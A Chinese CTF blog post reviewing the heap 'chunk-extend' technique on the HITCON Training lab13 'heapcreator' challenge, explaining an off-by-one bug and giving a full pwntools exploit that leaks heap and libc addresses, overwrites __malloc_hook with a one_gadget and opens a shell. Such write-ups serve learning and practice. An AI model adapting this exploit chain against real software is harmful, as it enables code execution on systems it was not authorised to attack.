pwn老萌新重拾pwn夢(mèng)想--chunk-extend

寫在最前面

不知不覺(jué)已經(jīng)是2019年3月下旬了,過(guò)去的一年里,我將大部分的時(shí)間和精力都花在了復(fù)習(xí)考研上,本來(lái)想學(xué)習(xí)pwn的計(jì)劃鴿和很久,現(xiàn)在終于有時(shí)間將以前pwn的知識(shí)撿回來(lái),同時(shí)繼續(xù)我的pwn萌新之旅了.看著身邊的人在這一年里,成長(zhǎng)進(jìn)步了很多,許多人已經(jīng)變成大佬,我這個(gè)老萌新也要加油了.時(shí)光匆匆,不知道我這個(gè)老萌新還能適應(yīng)ctf嗎?

前言

chunk-extend是一種ctf中常見的套路,他能帶來(lái)的好處也很多,比如泄露heap地址,libc的地址之類的,如果條件適當(dāng),我們還可以配合其他的堆利用方法,實(shí)現(xiàn)getshell等目的.
效果:

  • 泄露chunk中數(shù)據(jù)(感覺(jué)這個(gè)不重要)
  • 泄露已釋放堆中數(shù)據(jù)
  • 覆蓋已釋放堆中指針
  • 等等
    chunk-extend利用的條件比較常見的是off-by-one等溢出,就是利用0x18這一類堆塊占用下一堆塊pre-size位置的原理,進(jìn)行一字節(jié)的溢出,進(jìn)而覆蓋下一堆塊的size位置的數(shù)據(jù).今天也只總結(jié)這一種吧,后續(xù)補(bǔ)充.
    這次就算是撿回知識(shí),所以復(fù)習(xí)用的題目就比較簡(jiǎn)單了.

題目

HITCON Trainging lab13
題目鏈接
看下這個(gè)題目
這個(gè)題目里的edit函數(shù)中存在這樣的代碼:

edit

其中heaparray[v1]中存放的是chunk的size,(*heaparray[v1]+1)其實(shí)就是heaparray[v1+1]中存放的是堆的指針.這個(gè)題有這個(gè)洞就夠了.
在探索它的create后,發(fā)現(xiàn)這個(gè)題目簡(jiǎn)直不要太友好,因?yàn)閔eaparray就在堆上,我們甚至不需要構(gòu)造fastbin-attack之類的條件,直接改heaparray上的指針就好了,但是我還是想在下面把fastbin-attack的思路簡(jiǎn)單總結(jié)下

思路

上述已經(jīng)很明白了
第一種思路:直接修改heaparray上的指針
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pwn import *

r = process('./heapcreator')
heap = ELF('./heapcreator')
libc = ELF('./libc.so.6')
one_gadget = 0x4526a

def create(size, content):
    r.recvuntil(":")
    r.sendline("1")
    r.recvuntil(":")
    r.sendline(str(size))
    r.recvuntil(":")
    r.sendline(content)


def edit(idx, content):
    r.recvuntil(":")
    r.sendline("2")
    r.recvuntil(":")
    r.sendline(str(idx))
    r.recvuntil(":")
    r.sendline(content)


def show(idx):
    r.recvuntil(":")
    r.sendline("3")
    r.recvuntil(":")
    r.sendline(str(idx))


def delete(idx):
    r.recvuntil(":")
    r.sendline("4")
    r.recvuntil(":")
    r.sendline(str(idx))

'''
test for off-by-one
'''
create(0x18,'a'*0x18)
create(0x18,'a'*0x18)
print r.recvuntil("\n")
edit(0,'a'*24+'\x71')
print r.recvuntil("\n")
'''
sucess
'''

'''
leak address 
'''
create(0x10,p64(0)+p64(0x21))#2
delete(1)
create(0x60,p64(0xdeadbeefdeadbeef))# 0x40 info:60 1
show(1)
r.recvuntil('Content : ')
r.recv(8)
a = r.recvuntil('Done !')[:-7]
'''
free chunk into fastbin,get heap address
'''
heap_addr = u64(a+'\x00'*(8-len(a))) - 0x0a 
success('heap_addr: '+hex(heap_addr))

'''
free chunk into unsortbin,get libc address
'''
create(0x90,p64(0xbbbb)) #3 info d0 0xe0
create(0x10,p64(0xaaaa))
payload = p64(0)+p64(0)+p64(0)+p64(0x21)+p64(0x100)
edit(1,payload+p64(heap_addr + 0xf0))
delete(3)
show(1)
r.recvuntil('Content : ')
a = r.recvuntil('Done !')[:-7]
libc_addr = u64(a+'\x00'*(8-len(a))) - 3951480
success('lib_addr: ' + hex(libc_addr))

'''
pwn!!!
'''

create(0x10,'a')
edit(1,payload+p64(0)+p64(0xa)+p64(0)*11+p64(0x80)+p64(0x20)+p64(0x10)+p64(libc_addr + 3951376))
edit(4,p64(one_gadget+ libc_addr))
'''
change the content of heaparray.hijack malloc_hook.
'''
r.recvuntil(":")
r.sendline("1")
r.interactive()

這里注釋比較清晰了,這里我覆蓋了malloc_hook,在第二種方法中,也是可以的
第二種方法:fastbin-attack
就不貼代碼了,也比較簡(jiǎn)單,地址都泄露出來(lái)了,只要接下了構(gòu)造0x70的fastbin就ok,直接指向malloc_hook,我一年前的文章應(yīng)該也提過(guò)類似的方法.

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末杠巡,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子谬返,更是在濱河造成了極大的恐慌司训,老刑警劉巖养篓,帶你破解...
    沈念sama閱讀 206,968評(píng)論 6 482
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件抵恋,死亡現(xiàn)場(chǎng)離奇詭異碳默,居然都是意外死亡钱慢,警方通過(guò)查閱死者的電腦和手機(jī)逮京,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,601評(píng)論 2 382
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)束莫,“玉大人懒棉,你說(shuō)我怎么就攤上這事±缆蹋” “怎么了策严?”我有些...
    開封第一講書人閱讀 153,220評(píng)論 0 344
  • 文/不壞的土叔 我叫張陵,是天一觀的道長(zhǎng)饿敲。 經(jīng)常有香客問(wèn)我妻导,道長(zhǎng),這世上最難降的妖魔是什么诀蓉? 我笑而不...
    開封第一講書人閱讀 55,416評(píng)論 1 279
  • 正文 為了忘掉前任栗竖,我火速辦了婚禮,結(jié)果婚禮上渠啤,老公的妹妹穿的比我還像新娘狐肢。我一直安慰自己,他們只是感情好沥曹,可當(dāng)我...
    茶點(diǎn)故事閱讀 64,425評(píng)論 5 374
  • 文/花漫 我一把揭開白布份名。 她就那樣靜靜地躺著,像睡著了一般妓美。 火紅的嫁衣襯著肌膚如雪僵腺。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 49,144評(píng)論 1 285
  • 那天壶栋,我揣著相機(jī)與錄音辰如,去河邊找鬼。 笑死贵试,一個(gè)胖子當(dāng)著我的面吹牛琉兜,可吹牛的內(nèi)容都是我干的凯正。 我是一名探鬼主播,決...
    沈念sama閱讀 38,432評(píng)論 3 401
  • 文/蒼蘭香墨 我猛地睜開眼豌蟋,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼廊散!你這毒婦竟也來(lái)了?” 一聲冷哼從身側(cè)響起梧疲,我...
    開封第一講書人閱讀 37,088評(píng)論 0 261
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤允睹,失蹤者是張志新(化名)和其女友劉穎,沒(méi)想到半個(gè)月后幌氮,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體缭受,經(jīng)...
    沈念sama閱讀 43,586評(píng)論 1 300
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,028評(píng)論 2 325
  • 正文 我和宋清朗相戀三年浩销,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了贯涎。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 38,137評(píng)論 1 334
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡慢洋,死狀恐怖塘雳,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情普筹,我是刑警寧澤败明,帶...
    沈念sama閱讀 33,783評(píng)論 4 324
  • 正文 年R本政府宣布,位于F島的核電站太防,受9級(jí)特大地震影響妻顶,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜蜒车,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,343評(píng)論 3 307
  • 文/蒙蒙 一讳嘱、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧酿愧,春花似錦沥潭、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,333評(píng)論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)。三九已至庞钢,卻和暖如春拔恰,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背基括。 一陣腳步聲響...
    開封第一講書人閱讀 31,559評(píng)論 1 262
  • 我被黑心中介騙來(lái)泰國(guó)打工颜懊, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 45,595評(píng)論 2 355
  • 正文 我出身青樓河爹,卻偏偏與公主長(zhǎng)得像使鹅,于是被迫代替她去往敵國(guó)和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子昌抠,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 42,901評(píng)論 2 345

推薦閱讀更多精彩內(nèi)容

  • 參考文章: 關(guān)于heap overflow的一些筆記 by ETenal [CTF]Heap vuln -- u...
    BJChangAn閱讀 2,660評(píng)論 2 5
  • libc2.26 之后的 Tcache 機(jī)制 1. Tcache 概述 ? tcache是libc2.26之...
    Nevv閱讀 8,523評(píng)論 0 2
  • 新手練習(xí) CGfsb 簡(jiǎn)單的格式化字符串 get_shell nc 上去直接 cat flag hello_pwn...
    Nevv閱讀 3,247評(píng)論 0 6
  • [ 范兒導(dǎo)讀 ] 作者認(rèn)為“教育平臺(tái)”的業(yè)務(wù)模式為,通過(guò)聚合資源服務(wù)于用戶鲁僚,從而完成資源與用戶的匹配形成交易炊苫,業(yè)務(wù)...
    OOS閱讀 354評(píng)論 0 3
  • 昨晚1點(diǎn)才上床休息,今早果真起不來(lái)冰沙。九點(diǎn)多起來(lái)收拾東西侨艾,出去喝了早茶,一桌都是油煎的點(diǎn)心拓挥,膩得很唠梨,心心念念許久未吃...
    水漓閱讀 95評(píng)論 0 0